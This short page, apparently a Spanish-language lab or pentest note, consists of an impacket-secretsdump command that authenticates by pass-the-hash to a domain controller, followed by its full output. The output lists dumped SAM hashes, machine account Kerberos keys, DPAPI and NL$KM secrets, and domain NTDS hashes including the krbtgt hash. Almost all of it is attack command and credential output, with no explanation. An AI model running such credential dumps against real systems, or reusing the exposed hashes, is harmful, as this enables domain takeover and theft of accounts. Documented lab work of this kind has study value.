Utilizando Impacket-secretsdump
kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 [email protected] -hashes :64fbae31cc352fc26af97cbdef151e03
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x6819873eadf71f0789285138af013772
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4
SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4
SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920
SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9
dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18
[+] Looking into NL$KM
[*] NL$KM
0000 8D D2 8E 67 54 58 89 B1 C9 53 B9 5B 46 A2 B3 66 ...gTX...S.[F..f
0010 D4 3B 95 80 92 7D 67 78 B7 1D F9 2D A5 55 B7 A3 .;...}gx...-.U..
0020 61 AA 4D 86 95 85 43 86 E3 12 9E C4 91 CF 9A 5B a.M...C........[
0030 D8 BB 0D AE FA D3 41 E0 D8 66 3D 19 75 A2 D1 B2 ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_uAKYyEam
[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500
[+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::Última actualización